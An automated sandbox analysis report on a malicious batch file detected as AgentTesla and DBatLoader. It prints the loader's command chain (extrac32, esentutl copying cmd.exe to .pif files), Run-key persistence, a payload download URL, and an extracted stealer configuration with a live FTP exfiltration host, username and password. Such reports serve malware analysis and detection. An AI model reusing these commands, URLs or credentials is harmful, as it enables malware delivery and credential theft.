Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
z1Transaction_ID_REF2418_cmd.bat

Overview

General Information

Sample name:z1Transaction_ID_REF2418_cmd.bat
Analysis ID:1545203
MD5:597443c0b1405f3deaa48eef7de516c4
SHA1:8f3688a384a9a8c8f70fc6a19382d73fbded0674
SHA256:553f1b4f0532c10e855e349a79d51c1fbffe6f9e03360e50b1445b82d1667ebb
Tags:batuser-Porcupine
Infos:

Detection

AgentTesla, DBatLoader, PureLog Stealer
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AgentTesla
Yara detected DBatLoader
Yara detected PureLog Stealer
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to check if a debugger is running (CheckRemoteDebuggerPresent)
Contains functionality to log keystrokes (.Net Source)
Creates multiple autostart registry keys
Drops PE files to the user root directory
Drops PE files with a suspicious file extension
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
Found large BAT file
Hides that the sample has been downloaded from the Internet (zone.identifier)
Installs a global keyboard hook
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Sample uses process hollowing technique
Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
Sigma detected: Execution from Suspicious Folder
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Suspicious Program Location with Network Connections
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks if the current process is being debugged
Contains functionality to call native functions
Contains functionality to check if a connection to the internet is available
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a process as a different user
Contains functionality to query locales information (e.g. system language)
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found evasive API chain (date check)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains sections with non-standard names
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Execution of Suspicious File Type Extension
Uses FTP
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara detected Keylogger Generic
Yara signature match

Classification

Process Tree

  • System is w10x64
  • cmd.exe (PID: 7152 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" " MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
    • conhost.exe (PID: 6260 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • extrac32.exe (PID: 6544 cmdline: extrac32 /y "C:\Users\user\Desktop\z1Transaction_ID_REF2418_cmd.bat" "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 41330D97BF17D07CD4308264F3032547)
    • x.exe (PID: 4888 cmdline: "C:\Users\user\AppData\Local\Temp\x.exe" MD5: 08C4AFC4A714EDFE9F2554B72DA40A04)
      • cmd.exe (PID: 1740 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Libraries\xrbjyllC.cmd" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 5800 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • esentutl.exe (PID: 2308 cmdline: C:\\Windows\\System32\\esentutl /y C:\\Windows\\System32\\cmd.exe /d C:\\Users\\Public\\alpha.pif /o MD5: 5F5105050FBE68E930486635C5557F84)
      • esentutl.exe (PID: 5716 cmdline: C:\\Windows\\System32\\esentutl.exe /y C:\Users\user\AppData\Local\Temp\x.exe /d C:\\Users\\Public\\Libraries\\Cllyjbrx.PIF /o MD5: 5F5105050FBE68E930486635C5557F84)
        • conhost.exe (PID: 5956 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • xrbjyllC.pif (PID: 4544 cmdline: C:\Users\Public\Libraries\xrbjyllC.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • Cllyjbrx.PIF (PID: 1440 cmdline: "C:\Users\Public\Libraries\Cllyjbrx.PIF" MD5: 08C4AFC4A714EDFE9F2554B72DA40A04)
    • xrbjyllC.pif (PID: 4108 cmdline: C:\Users\Public\Libraries\xrbjyllC.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • sgxIb.exe (PID: 6520 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • Cllyjbrx.PIF (PID: 1068 cmdline: "C:\Users\Public\Libraries\Cllyjbrx.PIF" MD5: 08C4AFC4A714EDFE9F2554B72DA40A04)
    • xrbjyllC.pif (PID: 6568 cmdline: C:\Users\Public\Libraries\xrbjyllC.pif MD5: C116D3604CEAFE7057D77FF27552C215)
  • sgxIb.exe (PID: 2488 cmdline: "C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exe" MD5: C116D3604CEAFE7057D77FF27552C215)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
Agent Tesla, AgentTeslaA .NET based information stealer readily available to actors due to leaked builders. The malware is able to log keystrokes, can access the host's clipboard and crawls the disk for credentials or other valuable information. It has the capability to send information back to its C&C via HTTP(S), SMTP, FTP, or towards a Telegram channel.
  • SWEED
https://malpedia.caad.fkie.fraunhofer.de/details/win.agent_tesla
NameDescriptionAttributionBlogpost URLsLink
DBatLoaderThis Delphi loader misuses Cloud storage services, such as Google Drive to download the Delphi stager component. The Delphi stager has the actual payload embedded as a resource and starts it.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dbatloader

Malware Configuration

Threatname: DBatLoader

{"Download Url": ["https://himalayastrek.com/origins/233_Cllyjbrxmng"]}

Threatname: Agenttesla

{"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
      00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
        00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
            0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              Click to see the 73 entries

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              9.1.xrbjyllC.pif.400000.3.raw.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1e4b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x1300:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 39 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x2018a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1fdd0:$s5: delete[]
              • 0x1f288:$s6: constructor or from DllMain.
              17.1.xrbjyllC.pif.400000.2.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 39 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1e9d0:$s5: delete[]
              • 0x1de88:$s6: constructor or from DllMain.
              11.2.xrbjyllC.pif.400000.2.unpackMALWARE_Win_RedLineDetects RedLine infostealerditekSHen
              • 0x1d0b0:$s1: 23 00 2B 00 33 00 3B 00 43 00 53 00 63 00 73 00
              • 0x80:$s2: 68 10 84 2D 2C 71 EA 7E 2C 71 EA 7E 2C 71 EA 7E 32 23 7F 7E 3F 71 EA 7E 0B B7 91 7E 2B 71 EA 7E 2C 71 EB 7E 5C 71 EA 7E 32 23 6E 7E 1C 71 EA 7E 32 23 69 7E A2 71 EA 7E 32 23 7B 7E 2D 71 EA 7E
              • 0x700:$s3: 83 EC 38 53 B0 F3 88 44 24 2B 88 44 24 2F B0 39 88 44 24 30 88 44 24 31 88 44 24 33 55 56 8B F1 B8 0C 00 FE FF 2B C6 89 44 24 14 B8 0D 00 FE FF 2B C6 89 44 24 1C B8 02 00 FE FF 2B C6 89 44 24 ...
              • 0x1ed8a:$s4: B|BxBtBpBlBhBdB`B\BXBTBPBLBHBDB@B<B8B4B0B,B(B$B B
              • 0x1e9d0:$s5: delete[]
              • 0x1de88:$s6: constructor or from DllMain.
              11.2.xrbjyllC.pif.29a80000.9.raw.unpackJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                11.2.xrbjyllC.pif.29a80000.9.raw.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
                  Click to see the 198 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: DLL Search Order Hijackig Via Additional Space in Path
                  Source: File createdAuthor: frack113, Nasreddine Bencherchali: Data: EventID: 11, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4888, TargetFilename: C:\Windows \SysWOW64\NETUTILS.dll
                  Sigma detected: Execution from Suspicious Folder
                  Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: C:\Users\Public\Libraries\xrbjyllC.pif, CommandLine: C:\Users\Public\Libraries\xrbjyllC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xrbjyllC.pif, NewProcessName: C:\Users\Public\Libraries\xrbjyllC.pif, OriginalFileName: C:\Users\Public\Libraries\xrbjyllC.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4888, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\xrbjyllC.pif, ProcessId: 4544, ProcessName: xrbjyllC.pif
                  Sigma detected: New RUN Key Pointing to Suspicious Folder
                  Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\Public\Cllyjbrx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cllyjbrx
                  Sigma detected: Suspicious Program Location with Network Connections
                  Source: Network ConnectionAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: DestinationIp: 172.67.74.152, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Users\Public\Libraries\xrbjyllC.pif, Initiated: true, ProcessId: 4544, Protocol: tcp, SourceIp: 192.168.2.4, SourceIsIpv6: false, SourcePort: 49732
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\Public\Cllyjbrx.url, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\x.exe, ProcessId: 4888, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Cllyjbrx
                  Sigma detected: Execution of Suspicious File Type Extension
                  Source: Process startedAuthor: Max Altgelt (Nextron Systems): Data: Command: C:\Users\Public\Libraries\xrbjyllC.pif, CommandLine: C:\Users\Public\Libraries\xrbjyllC.pif, CommandLine|base64offset|contains: , Image: C:\Users\Public\Libraries\xrbjyllC.pif, NewProcessName: C:\Users\Public\Libraries\xrbjyllC.pif, OriginalFileName: C:\Users\Public\Libraries\xrbjyllC.pif, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\x.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\x.exe, ParentProcessId: 4888, ParentProcessName: x.exe, ProcessCommandLine: C:\Users\Public\Libraries\xrbjyllC.pif, ProcessId: 4544, ProcessName: xrbjyllC.pif

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:35:22.962696+010020299271A Network Trojan was detected192.168.2.449744110.4.45.19721TCP
                  2024-10-30T08:35:39.357736+010020299271A Network Trojan was detected192.168.2.449753110.4.45.19721TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-10-30T08:35:23.900856+010028555421A Network Trojan was detected192.168.2.449747110.4.45.19754601TCP
                  2024-10-30T08:35:23.907031+010028555421A Network Trojan was detected192.168.2.449747110.4.45.19754601TCP
                  2024-10-30T08:35:40.260221+010028555421A Network Trojan was detected192.168.2.449754110.4.45.19763940TCP
                  2024-10-30T08:35:40.266852+010028555421A Network Trojan was detected192.168.2.449754110.4.45.19763940TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: z1Transaction_ID_REF2418_cmd.batMalware Configuration Extractor: DBatLoader {"Download Url": ["https://himalayastrek.com/origins/233_Cllyjbrxmng"]}
                  Source: 11.2.xrbjyllC.pif.26ec0ee8.6.raw.unpackMalware Configuration Extractor: Agenttesla {"Exfil Mode": "FTP", "Host": "ftp://ftp.haliza.com.my", "Username": "origin@haliza.com.my", "Password": "JesusChrist007$"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\Public\Libraries\Cllyjbrx.PIFReversingLabs: Detection: 31%
                  Source: C:\Users\user\AppData\Local\Temp\x.exeReversingLabs: Detection: 31%
                  Multi AV Scanner detection for submitted file
                  Source: z1Transaction_ID_REF2418_cmd.batReversingLabs: Detection: 23%
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                  Compliance

                  barindex
                  Detected unpacking (overwrites its own PE header)
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifUnpacked PE file: 9.2.xrbjyllC.pif.400000.2.unpack
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifUnpacked PE file: 11.2.xrbjyllC.pif.400000.2.unpack
                  Source: C:\Users\Public\Libraries\xrbjyllC.pifUnpacked PE file: 17.2.xrbjyllC.pif.400000.1.unpack
                  Source: unknownHTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49731 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49732 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49737 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49740 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 50.116.93.185:443 -> 192.168.2.4:49751 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 172.67.74.152:443 -> 192.168.2.4:49752 version: TLS 1.2
                  Source: Binary string: E:\Adlice\Truesight\x64\Release\truesight.pdb source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdb source: x.exe, x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: _.pdb source: xrbjyllC.pif, 00000009.00000002.1886701833.000000002AC91000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1887098734.000000002C240000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000009.00000002.1885443724.00000000299AF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000003.1723831872.000000002802C000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2036790084.0000000026ABF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2037435612.0000000026EC0000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000003.1829118494.0000000024F7D000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000002.2039086668.0000000027F51000.00000004.00000800.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000003.1999135906.0000000020784000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933556795.0000000022680000.00000004.08000000.00040000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2933003341.00000000220EF000.00000004.00000020.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000002.2936380782.0000000023711000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdbUGP source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
                  Source: Binary string: easinvoker.pdbH source: x.exe, 00000003.00000002.1755317512.000000007F220000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1695656562.000000007EF50000.00000004.00001000.00020000.00000000.sdmp, xrbjyllC.pif, 00000009.00000001.1719718721.0000000000820000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 0000000B.00000001.1826572703.00000000007D0000.00000040.00000001.00020000.00000000.sdmp, xrbjyllC.pif, 00000011.00000001.1996288631.00000000007D0000.00000040.00000001.00020000.00000000.sdmp
                  Source: Binary string: easinvoker.pdbGCTL source: x.exe, 00000003.00000002.1750879233.0000000020F1D000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000002.1723790812.0000000003004000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668677681.000000007FB90000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1668442812.0000000003000000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1725659576.00000000031EE000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021720000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000003.1716716045.0000000021751000.00000004.00000020.00020000.00000000.sdmp, x.exe, 00000003.00000002.1750879233.0000000020EED000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000003.00000003.1667912373.000000007FE00000.00000004.00001000.00020000.00000000.sdmp
                  Source: Binary string: cmd.pdb source: esentutl.exe, 00000006.00000003.1716976132.0000000004E40000.00000004.00001000.00020000.00000000.sdmp, alpha.pif.6.dr
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031C5908 GetModuleHandleA,GetProcAddress,lstrcpynA,lstrcpynA,lstrcpynA,FindFirstFileA,FindClose,lstrlenA,lstrcpynA,lstrlenA,lstrcpynA,3_2_031C5908
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 13_2_0040128D RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,FindFirstFileA,FindClose,GetLocalTime,13_2_0040128D
                  Source: C:\Users\user\AppData\Roaming\sgxIb\sgxIb.exeCode function: 13_2_00401612 RegOpenKeyA,RegQueryValueA,RegCloseKey,RegCloseKey,GetLocalTime,CreateDirectoryA,FindFirstFileA,MoveFileA,FindNextFileA,FindClose,13_2_00401612

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49744 -> 110.4.45.197:21
                  Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49747 -> 110.4.45.197:54601
                  Source: Network trafficSuricata IDS: 2029927 - Severity 1 - ET MALWARE AgentTesla Exfil via FTP : 192.168.2.4:49753 -> 110.4.45.197:21
                  Source: Network trafficSuricata IDS: 2855542 - Severity 1 - ETPRO MALWARE Agent Tesla CnC Exfil Activity : 192.168.2.4:49754 -> 110.4.45.197:63940
                  C2 URLs / IPs found in malware configuration
                  Source: Malware configuration extractorURLs: https://himalayastrek.com/origins/233_Cllyjbrxmng
                  Connects to many ports of the same IP (likely port scanning)
                  Source: global trafficTCP traffic: 110.4.45.197 ports 50707,62466,63940,62962,56275,55553,1,2,53369,54601,61195,21
                  Source: C:\Users\user\AppData\Local\Temp\x.exeCode function: 3_2_031DE4B8 InternetCheckConnectionA,3_2_031DE4B8
                  Source: global trafficTCP traffic: 192.168.2.4:49735 -> 110.4.45.197:50707
                  Source: Joe Sandbox ViewIP Address: 110.4.45.197 110.4.45.197
                  Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                  Source: Joe Sandbox ViewIP Address: 172.67.74.152 172.67.74.152
                  Source: Joe Sandbox ViewASN Name: UNIFIEDLAYER-AS-1US UNIFIEDLAYER-AS-1US
                  Source: Joe Sandbox ViewASN Name: EXABYTES-AS-APExaBytesNetworkSdnBhdMY EXABYTES-AS-APExaBytesNetworkSdnBhdMY
                  Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownDNS query: name: api.ipify.org
                  Source: unknownFTP traffic detected: 110.4.45.197:21 -> 192.168.2.4:49734 220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 10 of 50 allowed.220-Local time is now 15:35. Server port: 21.220-This is a private system - No anonymous login220-IPv6 connections are also welcome on this server.220 You will be disconnected after 15 minutes of inactivity.
                  Source: global trafficHTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: global trafficHTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /origins/233_Cllyjbrxmng HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: himalayastrek.com
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0Host: api.ipify.orgConnection: Keep-Alive
                  Source: global trafficDNS traffic detected: DNS query: himalayastrek.com
                  Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                  Source: global trafficDNS traffic detected: DNS query: ftp.haliza.com.my
